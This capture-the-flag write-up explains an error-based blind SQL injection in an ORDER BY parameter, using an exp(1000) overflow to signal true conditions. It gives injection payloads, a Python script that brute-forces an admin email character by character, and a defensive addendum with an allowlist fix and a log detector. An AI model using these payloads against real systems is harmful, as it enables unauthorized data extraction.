So... it seems we have to find the admin's email address, and the parameters we can make use of are 'order' and 'email'.

We can infer from the filters that this won't be a union-based SQL injection, since the page simply dies whenever we try to use union.

The basic SQL syntax for this challenge:

select id,email,score from prob_hell_fire where 1 order by {order}

loads every row of prob_hell_fire into three columns (id, email, score) and sorts them by whatever the order GET parameter contains. We can confirm this by passing order=id.

Since nothing other than union is filtered, we can use the basic blind-injection techniques built on conditions and substrings. In other words, this one is a brute-force, just like a few of the previous challenges.

Just as a reminder, the basic syntax is:

if(condition,when_true,when_false)
substr(some_string,starting_pos<int>,new_str_length<int>)

Since the source code has no error handling at all, there is no output whenever MySQL raises an error, so we can try an error-based SQL injection for this challenge.

My approach was to trigger an error using an overflow: exp(n).

exp(n) computes e^n, and the result only fits in a double (maximum about 1.79E+308) when n is less than 710. Therefore, we can pass in a number bigger than 709 to cause an error, which gives us an indication that something is going on in the backend.

Using this, we can build a conditional expression like:

if(condition,exp(1000),1)

In this way, if the condition is satisfied, the query errors out and the table empties. We can verify that it works:

- check whether the length of the email is shorter than 1: the table is not empty.
- check whether the length of the email is longer than 1: the table is empty.

I solved the challenge in two steps: first finding the length of the email, then brute-forcing the email using the length I found.

1. Finding the length

?order=1 and id='admin' and if((length(email)=SOME_INT),exp(1000),1)

2. Finding the email (using substr)

?order=1 and id='admin' and if((ascii(substr(email,LENGTH_ITERATE,1))=DEC_ASCII_CHAR),exp(1000),1)

As we have figured out the pattern, we can now write the exploit code:

import requests

pw = ""      # the admin email, recovered one character at a time
length = 0

url = "YOUR_URL"
session = dict(PHPSESSID="YOUR_SESSION_ID")

# When the injected condition is true, exp(1000) overflows, the query errors
# out and the table is rendered empty, so the other user's row ("rubiya")
# disappears from the response.

# find length
print("[*] Finding Length...")

for i in range(0, 100):
    try:
        query = url + "?order=1 and id='admin' and if((length(email)="
        query = query + str(i) + "),exp(1000),1)"
        r = requests.post(query, cookies=session)
    except requests.RequestException:
        print("[-] An error occurred, shutting down...")
        raise SystemExit(1)

    if "rubiya" not in r.text:
        length = i
        break

print("[+] Length found: ", length)

# find email
print("[*] Finding Email... (Brute-forcing may take a while)")

# substr() positions are 1-based, so iterate from 1, not 0
for i in range(1, length + 1):
    for j in range(32, 127):  # printable ASCII, so '.', '@' and '_' are covered
        try:
            query = url + "?order=1 and id='admin' and if((ascii(substr(email,"
            query = query + str(i) + ",1))=" + str(j) + "),exp(1000),1)"
            r = requests.post(query, cookies=session)
        except requests.RequestException:
            print("[-] An error occurred, shutting down...")
            raise SystemExit(1)
        if "rubiya" not in r.text:
            pw = pw + chr(j)
            print("[+] ", pw)
            break

print("[+] Email found: ", pw)

We have now defeated hellfire!

You can find the solution code for this challenge here.
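Seen from the defending side, here is the pattern this challenge exploits and its fix, as an added example that is not part of the writeup or of the challenge's own code: the vulnerable query builder beside an allowlisted one (ORDER BY identifiers cannot be bound as prepared-statement parameters, so a column allowlist is the fix), plus a check over constructed access-log lines that flags the kind of order values the script above sends. The table and column names come from the query on this page; the log layout and IP addresses are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Columns the challenge query exposes; only these may be used as a sort key.
ALLOWED_ORDER_COLUMNS = ("id", "email", "score")


def build_query_vulnerable(order):
    """The challenge's pattern: the GET parameter lands verbatim in ORDER BY,
    so "1 and id='admin' and if(...,exp(1000),1)" becomes part of the SQL."""
    return "select id,email,score from prob_hell_fire where 1 order by " + order


def build_query_hardened(order, direction="asc"):
    """Allowlist the sort key: anything that is not a known column is refused."""
    if order not in ALLOWED_ORDER_COLUMNS:
        raise ValueError("unsupported sort column: %r" % order)
    if direction.lower() not in ("asc", "desc"):
        raise ValueError("unsupported sort direction: %r" % direction)
    return ("select id,email,score from prob_hell_fire where 1 order by %s %s"
            % (order, direction.lower()))


def suspicious_order_requests(log_lines):
    """Flag access-log entries whose 'order' parameter is not a bare column
    name. The brute-force loop sends hundreds of such requests, so hits
    cluster on one source IP. Assumed (constructed) log layout:
    '<ip> "<METHOD> <path?query> HTTP/1.1" <status>'."""
    entry = re.compile(r'(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
    hits = []
    for line in log_lines:
        m = entry.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        for value in parse_qs(urlsplit(target).query).get("order", []):
            if value not in ALLOWED_ORDER_COLUMNS:
                hits.append((ip, value))
    return hits


# Constructed sample log: one legitimate sort, then two length/substr probes.
SAMPLE_LOG = [
    '10.0.0.5 "GET /hell_fire/?order=email HTTP/1.1" 200',
    '10.0.0.9 "GET /hell_fire/?order=1%20and%20id%3D%27admin%27%20and%20'
    'if((length(email)%3D5),exp(1000),1) HTTP/1.1" 200',
    '10.0.0.9 "GET /hell_fire/?order=1%20and%20id%3D%27admin%27%20and%20'
    'if((ascii(substr(email,1,1))%3D97),exp(1000),1) HTTP/1.1" 200',
]
```

Running suspicious_order_requests(SAMPLE_LOG) returns the two probe entries from 10.0.0.9 with their decoded order values, while the plain order=email request is not flagged.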